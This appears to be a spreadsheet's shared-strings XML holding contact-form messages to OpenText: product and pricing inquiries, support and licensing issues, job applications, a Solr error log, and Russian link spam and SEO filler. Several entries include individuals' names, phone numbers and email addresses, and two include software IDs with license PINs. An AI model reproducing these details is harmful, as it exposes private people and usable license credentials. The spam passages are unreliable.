in this job making you Watch moreover notice all recent large definition window tinting films, Songs in addition as you likewise free download these to your plaything. better component the necessary paperwork has become receive unlimited clip and has now far more 200 attain television channels completely free. vmate is often, believe it or not, a multi functional practical application. across 50,000+ cordless satisfied customers bring in and suf</t>
  </si>
  <si>
    <t>Hello! I want to open a technical ticket in My Support but I cannot find an admin account in our company. Please help to setup a Technical Role.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello my name is Rikki Fiske, I am a student at Florida Gulf Coast University and I am studying Forensic Science.  I was looking on indeed and noticed that you have a Forensic Scientist position open.  I am currently looking for an internship and was wondering if you have any opportunities that would help me in this area.  I currently live in Florida, however, I have a place to stay in Atlanta, Georgia.  Please contact me as soon as possible. I have attached my resume to this email as well. _x000D_
Thank you for your attention to this matter, _x000D_
Rikki Fiske_x000D_
_x000D_
561-706-8615_x000D_
rrfiske9393@eagle.fgcu.edu_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, _x000D_
Looking for a contact that looks after ANZ licensing. Would appreciate if you could get back to me with their details. </t>
  </si>
  <si>
    <t>I'm unable to log a support call for our RightFax product, keeps telling me that my account doesn't have access. _x000D_
_x000D_
My system ID is 26361-12145_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in products </t>
  </si>
  <si>
    <t>pricing info for upc catalog</t>
  </si>
  <si>
    <t>Desire to evaluate product as part of our digital solution and to look at becoming a VAR.</t>
  </si>
  <si>
    <t>We are in the process of upgrading our OTMM platform to 16.3.2 and DAMLink to 16.4. Interested to see if you can provide more insight into DAMLink 16.4 (are there any bugs/issues in 16.4?) and any presentations/slides to show regards new features for OTMM 16.3.2. Thank you</t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
Just a quick note to say how much I enjoyed your website. I thought the layout and information was very informative._x000D_
_x000D_
I’m writing to you because I noticed a technical issue that I wanted you to be aware of, it relates to how your search engine optimization is implemented. If you fix this issue it could have a really positive impact on performance. Do you want me to send you the issue or would you like me to jump on call so I can walk you through what I saw?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Helen Joyce_x000D_
Digital Marketing Manager_x000D_
(888) 417-4867_x000D_
Smarter Tactics_x000D_
Digital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing</t>
  </si>
  <si>
    <t>Interested in Fax2Mail for Healthcare, including pricing.  Thank you!</t>
  </si>
  <si>
    <t>One of our numbers is not working. 866-743-2281. Cannot send or receive. Can you please look into it? Thanks_x000D_
Also, I need a new line set up for ernesto@macbethas.com</t>
  </si>
  <si>
    <t>I am interested in a quote for a training session for the IM Team at CRTC on the latest version of eDOCS DM and RM.  Would it be possible to combine the 2-1145 Implementing Records Management using eDOCS RM course with some content about eDOCS DM?</t>
  </si>
  <si>
    <t>As I am starting to get settled here at UMass and digging into the current document management system (or lack thereof) and I am starting to look at potential other options for the University.  _x000D_
_x000D_
I would like to set up a time to talk to you about what we are trying to do before we go ahead with a demo.  _x000D_
_x000D_
Here are some of the challenges we have:_x000D_
_x000D_
•	valuable time being spent and leading to dead ends, _x000D_
•	people relying on the hard copy paper because they don’t think they can find the digital copy,_x000D_
•	Inconsistent file structures_x000D_
•	Files with no metadata associated to them _x000D_
•	Not knowing what you’re looking at without opening the file_x000D_
•	One location where people can search for project information and the archive of the facility_x000D_
•	No file revision control (space accounting DWGs)_x000D_
•	Application integration (eBuilder, GIS esri apps, Tririga work order/asset management system) linking of web base GIS  map viewer to documents of our facilities._x000D_
_x000D_
Thank you_x000D_
Larry</t>
  </si>
  <si>
    <t>Hi, we are in the process of moving our environments (Content Server, Captiva and Brava) and would like a quote for professional services to help with the move.    We currently have the following:_x000D_
OpenText Content Server 10.5 SP2 Update 06-2016_x000D_
OpenText Directory Services 10.5.0 SP1 with Patch 8_x000D_
Brava for Content Server 10.5.0_x000D_
Captiva InputAccel 6.5 SP2_x000D_
_x000D_
We would like to upgrade to the latest versions on the latest operating systems.  We have 1.5 TB of data that will need to be moved over.  Sorry for the late notice but could I get a quote by end of day Tuesday or early Wednesday morning.  Please let me know if you require additional info (such as the system report).</t>
  </si>
  <si>
    <t>Temos a necessidade hoje de realizar essa intregração para envio de nossos arquivos de cobrança CNAB 240 e recebimento dos arquivos de retorno do Banco. A integração seria apenas com o Banco Itaú.</t>
  </si>
  <si>
    <t>We are inquiring to find out about network licenses for Gupta Unify 11.5 and if you still provide software maintenance for this product. Please let me know_x000D_
thank you_x000D_
Marc</t>
  </si>
  <si>
    <t>Hello, I would like to request a copy of the 2018 renewal notice. Reference number: SUS08473621</t>
  </si>
  <si>
    <t>Good Morning. A government client has approached us about an opportunity that they have posted for bid since we have been selling them software for the last couple of years. Your software is already sold on GSA and I see the price list, but do you work with small vendors that utilize GOV "set-asides" to resell your software products?</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous souhaitons vous contacter pour une consultation pour votre outil Vignette._x000D_
Pouvez-vous me donner un contact opérationnel en France d'ici demain ?_x000D_
Je vous remercie,_x000D_
Pascale RENARD</t>
  </si>
  <si>
    <t>2018-07-23 10:14:28.645 INFO  (coreLoadExecutor-6-thread-1) [   ] o.a.s.s.IndexSchema unique key field: uoi_id_x000D_
2018-07-23 10:14:28.721 INFO  (coreLoadExecutor-6-thread-1) [   ] o.a.s.c.ConfigSetProperties Did not find ConfigSet properties, assuming default properties: Can't find resource 'configsetprops.json' in classpath or '/apps/opentext/solr_conf/data/solr5_otmm/otmmcore/conf'_x000D_
2018-07-23 10:14:28.721 INFO  (coreLoadExecutor-6-thread-1) [   ] o.a.s.c.CoreContainer Creating SolrCore 'otmm' using configuration from instancedir /apps/opentext/solr_conf/data/solr5_otmm/otmmcore/_x000D_
2018-07-23 10:14:28.722 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.SolrCore solr.NRTCachingDirectoryFactory_x000D_
2018-07-23 10:14:28.737 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.SolrCore [[otmm] ] Opening new SolrCore at [/apps/opentext/solr_conf/data/solr5_otmm/otmmcore/], dataDir=[null]_x000D_
2018-07-23 10:14:28.739 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.JmxMonitoredMap No JMX servers found, not exposing Solr information with JMX._x000D_
2018-07-23 10:14:28.742 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.SolrCore [[otmm] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.QuerySenderListener{queries=[]}]_x000D_
2018-07-23 10:14:28.742 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.SolrCore [[otmm] ] Added SolrEventListener for firstSearcher: [org.apache.solr.core.QuerySenderListener{queries=[{q=static firstSearcher warming in solrconfig.xml}]}]_x000D_
2018-07-23 10:14:28.753 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.CachingDirectoryFactory return new directory for /apps/opentext/solr_conf/data/solr5_otmm/otmmcore/data_x000D_
2018-07-23 10:14:28.759 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.SolrCore New index directory detected: old=null new=/apps/opentext/solr_conf/data/solr5_otmm/otmmcore/data/index.20180720191455390_x000D_
2018-07-23 10:14:28.760 INFO  (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.CachingDirectoryF</t>
  </si>
  <si>
    <t xml:space="preserve">Need to discuss the option of migrating to a more secure product. </t>
  </si>
  <si>
    <t>Need to discuss the option of migrating to a more secure product.</t>
  </si>
  <si>
    <t>I need a list of GSA vendors for renewal of Documentum support &amp; maintenance</t>
  </si>
  <si>
    <t>Seeking EDMS solution for a small biotech company</t>
  </si>
  <si>
    <t>We are seeing below error from Solr Node-1,_x000D_
Could you please look into this._x000D_
_x000D_
2018-07-23 10:13:24.500 ERROR (coreLoadExecutor-6-thread-1) [   x:otmm] o.a.s.c.CoreContainer Error creating core [otmm]: Index locked for write for core 'otmm'. Solr now longer supports forceful unlocking via 'unlockOnStartup'. Please verify locks manually!_x000D_
org.apache.solr.common.SolrException: Index locked for write for core 'otmm'. Solr now longer supports forceful unlocking via 'unlockOnStartup'. Please verify locks manually!_x000D_
        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:820)_x000D_
        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:659)_x000D_
        at org.apache.solr.core.CoreContainer.create(CoreContainer.java:723)_x000D_
        at org.apache.solr.core.CoreContainer$1.call(CoreContainer.java:443)_x000D_
        at org.apache.solr.core.CoreContainer$1.call(CoreContainer.java:434)_x000D_
        at java.util.concurrent.FutureTask.run(FutureTask.java:266)_x000D_
        at org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor$1.run(ExecutorUtil.java:210)_x000D_
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)_x000D_
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)_x000D_
        at java.lang.Thread.run(Thread.java:745)_x000D_
Caused by: org.apache.lucene.store.LockObtainFailedException: Index locked for write for core 'otmm'. Solr now longer supports forceful unlocking via 'unlockOnStartup'. Please verify locks manually!_x000D_
        at org.apache.solr.core.SolrCore.initIndex(SolrCore.java:528)_x000D_
        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:761)_x000D_
        ... 9 more_x000D_
2018-07-23 10:13:24.502 ERROR (coreContainerWorkExecutor-2-thread-1) [   ] o.a.s.c.CoreContainer Error waiting for SolrCore to be created_x000D_
java.util.concurrent.ExecutionException: org.apache.solr.common.SolrException: Unable to create core [otmm]_x000D_
        at java.util.concurrent.FutureTask.report(FutureTask.java:122)_x000D_
        at java.util.c</t>
  </si>
  <si>
    <t>Request for Opentext product implementation at IBM customer in Germany. Need sizing details of Document management system for around 400 000 invoices per year (measured for 2018, but expecting growth in next few years as well)</t>
  </si>
  <si>
    <t>Hello,_x000D_
Please grant me access to full support (Amexio is an OpenText Partner)._x000D_
Regards,_x000D_
Yannick Le Bihan</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
_x000D_
RE: Westlaw UK Search API retirement/closure. _x000D_
_x000D_
We licensed a search API for Westlaw UK (WLUK) to yourselves a few years ago and are making some changes to the same that will affect all of our mutual customers accessing WLUK via your product (The current API you have will cease to work at some point this year). I urgently would like to speak to someone regarding this please. Many thanks in advance._x000D_
_x000D_
Please do get in touch as we are proceeding with the re-development of the API and you will face disruption if you do not let us know if you are still using the same._x000D_
_x000D_
please respond via thesubmitted email address. _x000D_
Lloyd Bennett_x000D_
</t>
  </si>
  <si>
    <t>Hello, I would like to have more information on upcoming training sessions. We are located in Beaumont, CA. If you can please send us details, so we can register ahead of time, I would appreciate it.</t>
  </si>
  <si>
    <t xml:space="preserve">Sponsorship/ Media Partner/ Collaboration_x000D_
_x000D_
Greetings from Herbal Conference 2018. I would like to invite you to be a part of this conference. 5th International Conference on Herbal and Traditional Medicine is the best platform with  professionally  designed scientific program for the audience. It includes symposiums, workshops, keynote lectures, plenary talks, panel discussions and poster sessions on latest research and technological developments in the field of Herbal, traditional and Chinese Medicine as well as therapeutic aspects. The conference invites Experts like Herbalists, Acupuncturists, Natural healers, Researchers, Students, Young researchers and business delegates across the globe to be a part of this wonderful event, full of networking and knowledge sharing opportunity._x000D_
</t>
  </si>
  <si>
    <t>Can i get the link to download the ECM installation software</t>
  </si>
  <si>
    <t>We need to move licenses from computers we have and get our network license running correctly.  Can you send me a contact or information on this.  The old sites we generated licenses on is no longer working. _x000D_
Software ID: a036000000jkXLV                  PIN: 402592        ( JOBSERVER )  10 seats</t>
  </si>
  <si>
    <t>Hi, I tried to do the online courses on the Learning Central site and found that none of the courses under Process Suite (Partners) / Process Suite seem to be working. It opens the courses but no content is displayed. Please advise. Thanks</t>
  </si>
  <si>
    <t>Dear sir/madam,_x000D_
_x000D_
At Bosch Thermotechnik we have one factory that is using the StreamServe solution and we'd like to evaluate the option to extend that solution and to the most recent update._x000D_
As part of the I4.0 Applications team, I'd like to know if our team can evaluate the solution with a demo or a trial version._x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Best regards,_x000D_
Joaquim Ribeiro</t>
  </si>
  <si>
    <t>Hello, I'm a consultant for my client Suez. I want to download the support packages (till level 7) for the SAP Invoice Management by Open Text 7.5. I created an account on your site, but it seems I still cannot download these Support Packages. I get message "We're sorry, your account does not grant you access to this resource.". What needs to be done to get access?_x000D_
Kind regards_x000D_
Ivo De Wachter_x000D_
SAP Basis Consultant_x000D_
Expertum</t>
  </si>
  <si>
    <t>Would like to know how compatible Opentext is with S4HANA relating to archiving</t>
  </si>
  <si>
    <t>We had renewed our subscription with Hightail 10/05/2018 and went to log in and it now says Hightail is OpenText - how do I  log in now? I have also sent an email to Hightail support.  Cheers Naomi</t>
  </si>
  <si>
    <t>Hi, We would like to explore LiveLink as DMS or ECM for our organization. Kindly provide contact details to take it forward._x000D_
_x000D_
Regards_x000D_
Prashant</t>
  </si>
  <si>
    <t>Do you know anyone who can host first class for us? Do you still sell FIrst Class mail server?</t>
  </si>
  <si>
    <t>We are a company in the automotive industry, located in Jiangsu Province, China, we need to know about Documentum eroom products, do you have the appropriate team support in China, please?</t>
  </si>
  <si>
    <t>We have recently been made aware that we can interface VIM with Ariba and are interested in exploring this business enhancement. Could you please provide some information on the requirements of this interface? We need a starting point please._x000D_
Regards...Marion Knowles</t>
  </si>
  <si>
    <t>I saw the job posting which really attracts me and also suits me.</t>
  </si>
  <si>
    <t xml:space="preserve">I am moving my Brava Desktop software to another machine.  How can I get to what used to be this site: serialization.infograph dot com  in order to generate the MAC ID license key for my software?  Software ID: Q0W44A0059RB   PIN: 233047_x000D_
</t>
  </si>
  <si>
    <t>Want to meet asap</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Hope you are doing well. I worked in Cordys, India from 2010 to 2012 and then moved to Amazon. I'm in the process of applying Green card in USA, in this process, my attorney requested to get employment verification letter from Cordys. The challenge now is, Cordys is not a valid entity as OpenText acquired it in 2016. Solution suggested by my attorney is to get two letters:_x000D_
1. A letter from my supervisor bsanthan@opentext.com without letterhead._x000D_
2. A letter form OpenText HR about my employment dates and the acquisition of Cordys; this letter has to be on the OpenText letterhead._x000D_
_x000D_
Could you please advise the next steps. I look forward to receiving updates from you._x000D_
_x000D_
Thanks,_x000D_
Anantha Krishnan </t>
  </si>
  <si>
    <t>Hi, we use AlchemySearch 7 which is used on a laptop. This is not ideal and would like to move to a server side solution of this product._x000D_
Please could someone contact me regarding this?_x000D_
thanks</t>
  </si>
  <si>
    <t>Apply for a job</t>
  </si>
  <si>
    <t>Request demo about Livelink ,  Opentext ECM and Documentum. We are looking for collaboration tool</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Owner,_x000D_
_x000D_
Can you help me order few business laptops? I am a sound engineer and a music producer looking forward to go into full time oprations. Kindly email back the price incuding delivery to the address below my signature._x000D_
_x000D_
HP- Spectre *360 2-in-1 13.3'' 4K Ultra _x000D_
HD Touch- Screen Laptop-Intel  Core _x000D_
i7- 16GB Memory -512GB  SSD -HP_x000D_
Finished in dark ash Silver_x000D_
_x000D_
_x000D_
HP- Spectre *360 2-in-1 15.6'' 4K Ultra _x000D_
HD Touch- Screen Laptop-Intel  Core _x000D_
i7- 16GB Memory -512GB  SSD -HP_x000D_
Finished in Dark Ash Silver._x000D_
_x000D_
Apple - MacBook Pro -13.3''_x000D_
Display - Intel Core i7 -16GB Memory -_x000D_
512GB Solid State Drive -Space Gray_x000D_
_x000D_
Apple - MacBook Pro 15'' Display_x000D_
- Intel Core i7 16 GB Memory - 256GB_x000D_
Flash Storage (Latest Model) - Space Gray_x000D_
_x000D_
Thank you and feel free to call , text or email me back should you have further questions._x000D_
Hope to hear from you soon._x000D_
_x000D_
Elvis Pfeifer_x000D_
1408 Fairmont Dr_x000D_
Clearwater, FL 33755_x000D_
elvissp658@gmail.com_x000D_
727 600 6578_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>[url=http://bit.ly/2Lb3dch]веб чат онлайн девушки[/url]_x000D_
 _x000D_
 _x000D_
Чат бесплатно</t>
  </si>
  <si>
    <t>Found position in your organisation as a Technical writer. As I was looking for Job vhange</t>
  </si>
  <si>
    <t>[url=http://bit.ly/2Jji8iY]чат рулетка с девушками 18 лет бесплатно[/url]_x000D_
 _x000D_
 _x000D_
Чат бесплатно</t>
  </si>
  <si>
    <t>I purchased a Brava Desktop  TX program from your company, but when I try to access to download the program, your web page does not take me to the download page, therefore I can not access the program. Please send me the right link so I can install.</t>
  </si>
  <si>
    <t>hello, looking to buy license of gupta IDE software.</t>
  </si>
  <si>
    <t>Looking for a document text ocr and abstracting solution</t>
  </si>
  <si>
    <t>App won’t launch with iOS 12 beta</t>
  </si>
  <si>
    <t>Hello! Taulia has previously had an integration layer with OpenTextVIM and we are expanding our offering in S/4HANA. I'd like to work with OpenText to facilitate the upgrades our mutual customers are working towards. Please contact me to discuss opportunities for partnership or sales of a development license.</t>
  </si>
  <si>
    <t>I was wondering how you can preserve ink from an ink cartridge if it's open and you don't use it that often?</t>
  </si>
  <si>
    <t xml:space="preserve">Peels help to escape from the greater part old deficiencies dermatological cover. operations efficient at any age, recommended for skin layer of any type. After superficial peeling disappear minor wrinkles, skin turns out smooth, smooth. Recovery – 3 days. an Average peeling well copes wrinkles (expression, age, affects little pits, eliminates freckles. _x000D_
Adaptation – seven days. Deep peeling performing in the beauty medical facilities. This is maximum effective operation, however requires long period regeneration – up to month. _x000D_
[url=http://chemicalpeel.in/chemical-peel-before-and-after]chemical peel before and after photos[/url] </t>
  </si>
  <si>
    <t>I work for Canon Solutions America and have a few customers that have called into our desk with RightFax issues. I have a lab environment and was wondering if there was any kind of DEMO software available for partners for testing with applications, such as uniFLOW, eCopy._x000D_
_x000D_
Best Regards,_x000D_
Dennis</t>
  </si>
  <si>
    <t xml:space="preserve">I need a quote and lead-time for the following_x000D_
.Exceed v15	  OpenText | 6055N	OpenText Exceed15	3 EA_x000D_
Secure Shell v15	  OpenText | 6055N	OpenText Secure Shell 15	3 EA_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Peels can help to eliminate from most age deficiencies of the skin cover. exfoliation efficient at any age, intended for skin layer of any species. After superficial exposure disappear small wrinkles, skin area turns out smooth, smooth. Regeneration – three days. The middle peeling beautifully struggles wrinkles (expression, old, smoothing hardly noticeable scars, eliminates spots. _x000D_
Rehabilitation – seven days. Deep peeling conducting in the beauty clinics. This is maximum effective operation, but requires long period regeneration – about one month. _x000D_
[url=http://chemicalpeel.in/acne-scars-before-and-after-chemical-peel-do-they-look]acne scars before and after chemical peel[/url] </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Can you please send me a quote for the following:_x000D_
_x000D_
Model: 1000021914_x000D_
Invoice Plan: Fixed Firm Price (FFP) Not-to-Exceed Line Item Value: (Brand Name or Equal) Process Suite Named User. Standard named users (server/cpu/instance license required)_x000D_
_x000D_
Qty: 5 ea_x000D_
_x000D_
Model: 1000021916_x000D_
Invoice Plan: Fixed Firm Price (FFP) Not-to-Exceed Line Item Value: (Brand Name or Equal) Process Suite Process Participant user License. Standard named users (server/cpu/instance license required)_x000D_
_x000D_
Qty: 25 ea_x000D_
_x000D_
Model: 1000021914_x000D_
Invoice Plan: Fixed Firm Price (FFP) Not-to-Exceed Line Item Value: (Brand Name or Equal) Process Suite Named User License Maintenance_x000D_
_x000D_
Qty: 1 ea_x000D_
_x000D_
Model: 1000021916_x000D_
 Invoice Plan: Fixed Firm Price (FFP) Not-to-Exceed Line Item Value: (Brand Name or Equal) Process Suite Process Participant Maintenance_x000D_
_x000D_
Qty: 1 ea_x000D_
_x000D_
Model: 1000030861_x000D_
Invoice Plan: Fixed Firm Price (FFP) Not-to-Exceed Line Item Value: (Brand Name or Equal) Content Suite Process Participant user License. Standard named users_x000D_
_x000D_
Qty: 25 ea_x000D_
_x000D_
Model: 1000030861_x000D_
Invoice Plan: Fixed Firm Price (FFP) Not-to-Exceed Line Item Value: (Brand Name or Equal) Content Suite Platform Standard Named Users Maintenance_x000D_
Qty: 1 ea_x000D_
_x000D_
End-user: Department of State_x000D_
_x000D_
Ship to: Washington, DC 20036</t>
  </si>
  <si>
    <t>Looking for a new DMS</t>
  </si>
  <si>
    <t>looking for bulk redaction tool.</t>
  </si>
  <si>
    <t>Unable to access support tickets</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing sheet on your different services </t>
  </si>
  <si>
    <t xml:space="preserve">Job seeker </t>
  </si>
  <si>
    <t>Bitte um schnelle ad-hoc Schätzung der Lizenzkosten für:_x000D_
1000 Lizenzen OpenText Content Suite (Content Suite + Opentext Records Management, on-prem, named user, jährlich neu an User vergebbar, Zeitraum 5 Jahre).</t>
  </si>
  <si>
    <t>Needs help to know the way to integrate OpenText with Java web application</t>
  </si>
  <si>
    <t>Please can you tell us how well the Windows OpenText NFS Client works with Amazon Web Services Elastic File System (EFS)?</t>
  </si>
  <si>
    <t>Hello. 想问一件事情。希望你们可以帮我</t>
  </si>
  <si>
    <t>By no indicates is data recovery an easy procedure. It is a series of different measures taken at an attempt to restore lost data. Hard drive data recovery is the most frequently encountered issue. External hard drive data recovery, as with other types of recovery, can be challenging to do yourself and taking apart your hard disk might lead to more harm than good. _x000D_
 _x000D_
If you already removed your hard disk from the enclosure, please don't re-assemble it. In the event the hard drive has crashed on Friday, you can want it repaired before the beginning of the next week. When it has to do with external drives, there are a couple of obstacles that we commonly run into that could make getting your data very challenging. Driving one of the biggest economies in usa, Los Angeles is where to come across new emerging technologies. _x000D_
 _x000D_
Preventing data loss Of course the ideal approach is to prevent data loss in the very first location. Key data loss can place your business in danger. Therefore data loss from any 1 incident also tends to be somewhat significant. _x000D_
 _x000D_
In both the circumstances, it isn't feasible to normally access the data, although the data is present and intact on the hard disk. The majority of the times, the data is be confidential and lots of businesses want complete secrecy of information. If you wish to recover your lost data or need consultation solutions, feel free to get in touch with Secure Data Los Angeles. Data is precious to an organization and therefore loss of any magnitude is thought of as an extremely significant thing. In the event the data lost wasn't able to be recovered due to any specific reason, they don't take any payment from the customers. Not all data could be recoverable. In the event the data saved on your hard disk can't be read, there may be a problem with the file system or the partition table of your hard disk. _x000D_
 _x000D_
You're ensured the very best recovery procedures and solutions. You are able to either hire expert service that wil</t>
  </si>
  <si>
    <t>I was just informed that my YouSendIt account is up for auto renewal and then found out you are now the new owners of YouSendit or Hightail as it was called.  I do not want to renew this subscription so I want to cancel but I cannot access my account now.  What is the next step?</t>
  </si>
  <si>
    <t xml:space="preserve"> we would like to get a proposal on Lotus Notes migration</t>
  </si>
  <si>
    <t>I came across a vacancy related to legal manager. But there appears to be some issu with the posting, due to which the page is not openning. Please can you check and help me out with applying for the same.</t>
  </si>
  <si>
    <t>I'm looking to use Brava with CAD files in SharePoint. Is there a current version of Brava I can use for this or do I just need to buy the Desktop version?</t>
  </si>
  <si>
    <t xml:space="preserve">s'il est possible de m'envoyé par mail le lien de téléchargement de opentext information hub version open source </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
nous somme mandaté par un asset manager de dimension mondial pour la revue de leur process de contract mangement._x000D_
Ses besoins portent essentiellement sur les taches de validation des contrats, d'archivage et indexation et aussi sur la recherche de ses contrats et d'information à l'intérieur de ses contrats._x000D_
_x000D_
D'avance merci pour votre aide.</t>
  </si>
  <si>
    <t>We are interested in a dashboard creation tool for contact center (own development based on asterisk)with features to allow end users to create their own dashboards_x000D_
_x000D_
Please give us information about what components we need and which of them have any cost_x000D_
_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>We have been Teleform partners in Portugal since 1994 and we have several customers. _x000D_
I would like to get the contact of your Teleform Sales Manager in Southern Europe to discuss one sales opportunity. _x000D_
Thanks._x000D_
Regards,_x000D_
MC</t>
  </si>
  <si>
    <t>пенобетон _x000D_
 _x000D_
[url=http://gazobeton.portalsnab.ru]газоблок[/url]</t>
  </si>
  <si>
    <t>газобетон _x000D_
 _x000D_
[url=http://penobeton.portalsnab.ru]пенобетон[/url]</t>
  </si>
  <si>
    <t>Purchase of OCC license for customer in England.</t>
  </si>
  <si>
    <t>I have a Japan customer inquiry about Gupta Report builder.  Can you introduce US or APAC AE to explain this product pls? Thanks.</t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://тверь.газоблок-рст.рус]газосиликатный[/url]</t>
  </si>
  <si>
    <t>Hello, we have a client in the hospitality management and real estate development industry based in Germany. We have been hired to find a document management solution and was given your company's name as a possible solution. We would like to speak with someone regarding our project as soon as possible. The client needs the software/platform and the professional services to install and train staff._x000D_
_x000D_
Thank you,_x000D_
Daniel Young</t>
  </si>
  <si>
    <t>Need urgently Livelink license for our affiliate in New Zealand</t>
  </si>
  <si>
    <t>Hello, we're interested to know more about your ECM. Could you let us know whether your ECM can do the following:_x000D_
- Repository for uploading, organizing and sharing enterprise content and also allow external parties to upload documents_x000D_
- User interface to allow users to confirm/correct the OCR data extract_x000D_
- Auto classify documents into different types (e.g. invoice vs. payment application) and variations (e.g. different types of invoices) and then auto create folder in the repository according to its properties and auto route the documents into its folder_x000D_
- Automatic workflow after document is uploaded (document gets routed to manager for approval) and allow management approval with audit trail_x000D_
- Automatically paste signature/stamp on documents if needed_x000D_
_x000D_
Hope to hear from you soon. Thank you.</t>
  </si>
  <si>
    <t>i am a software, hardware developer. i am living in Ukraine, Kiev. i want to work with you. i ll be waiting for re-contact.</t>
  </si>
  <si>
    <t>газосиликат _x000D_
 _x000D_
[url=http://смоленск.пеноблок-рст.рус]пенобетон[/url]</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://газоблок-рст.рус]газосиликат[/url]</t>
  </si>
  <si>
    <t>We are looking for forensic tool which can extract memory from remote computer also can extract data from encrypted hard drive to readable format</t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://пеноблок-рст.рус]пенобетон[/url]</t>
  </si>
  <si>
    <t>I am having more than 1 year of experience and looking for a job in your reputed company.</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to update the email address and details in the support portal. After which I lost ALL access to it and was asked to request access again! I need access to download the reuqired parts for an Exstream build occuring in a few days. Original email was lgaffel@sikorsky.com.au. New email was: saal_it.gr-sik@lmco.com as Lenard Gaffel has left the organisation. Can this portal access please be restored as a matter of urgency please. </t>
  </si>
  <si>
    <t xml:space="preserve">Support for iOS 12. iOS client doesn’t connect on this version of iOS. Wondering if you need help fixing it. Or if you have a timeline for fixing it. </t>
  </si>
  <si>
    <t>газобетон _x000D_
 _x000D_
[url=http://gazobeton.portalsnab.ru]газобетон[/url]</t>
  </si>
  <si>
    <t>газоблок _x000D_
 _x000D_
[url=http://penobeton-pskov.portalsnab.ru]пеноблоки[/url]</t>
  </si>
  <si>
    <t>Can we resell your product to our clients?</t>
  </si>
  <si>
    <t>Request a quotation of Content Management System</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://penobeton-tver.portalsnab.ru]пенобетонный[/url]</t>
  </si>
  <si>
    <t>газоблок _x000D_
 _x000D_
[url=http://пеноблок-рст.рус]пеноблоки[/url]</t>
  </si>
  <si>
    <t>газобетон _x000D_
 _x000D_
[url=http://gazobeton-tver.portalsnab.ru]газоблок[/url]</t>
  </si>
  <si>
    <t>газобетоный _x000D_
 _x000D_
[url=http://gazobeton-pskov.portalsnab.ru]газосиликатный[/url]</t>
  </si>
  <si>
    <t>газобетоный _x000D_
 _x000D_
[url=http://gazobeton.portalsnab.ru]газобетон[/url]</t>
  </si>
  <si>
    <t>газосиликатный _x000D_
 _x000D_
[url=http://gazobeton-tver.portalsnab.ru]газоблок[/url]</t>
  </si>
  <si>
    <t>Really frustrating and unprofessional on so many levels. You guys take over Hightail and don't even forward the domain there for people trying to reach your site, and my login suddenly doesn't work when you should have absorbed their database of users, and I'm a paying customer so what happened to my account??</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://gazobeton-pskov.portalsnab.ru]газосиликат[/url]</t>
  </si>
  <si>
    <t>I would like a quote for Encase.</t>
  </si>
  <si>
    <t>We are running an old version of Qfiniti 3.6. our support partner no longer wishes to support the product. looking for Australian Support if available. We have an issue right now with the platform.wishing to discuss optiosn on and off shore support</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know if we can just purchase the Case Management portion of your People Center module. I have everything else, but this is what I'm missing from my current system. </t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://penobeton-pskov.portalsnab.ru]пеноблоки[/url]</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://penobeton.portalsnab.ru]пенобетонный[/url]</t>
  </si>
  <si>
    <t>газоблок _x000D_
 _x000D_
[url=http://газоблок-рст.рус]газобетон[/url]</t>
  </si>
  <si>
    <t>газобетон _x000D_
 _x000D_
[url=http://пеноблок-рст.рус]пеноблоки[/url]</t>
  </si>
  <si>
    <t>газосиликатный _x000D_
 _x000D_
[url=http://gazobeton-smolensk.portalsnab.ru]газоблок[/url]</t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://пеноблок-рст.рус]пенобетонный[/url]</t>
  </si>
  <si>
    <t>Information on FAX server product, on prem, to replace 300 - 400 fax machines / lines</t>
  </si>
  <si>
    <t>I would like a trial account.</t>
  </si>
  <si>
    <t>I'd like to cancel the messaging service for account # US01-107709 Southwest International Freight.  How do I do that?</t>
  </si>
  <si>
    <t xml:space="preserve">I need to archive email and Bloomberg IM/Mail for 6 Bloomberg users and 25 email mailboxes. I can use office 365 and your Bloomberg connector or just archive it all to you </t>
  </si>
  <si>
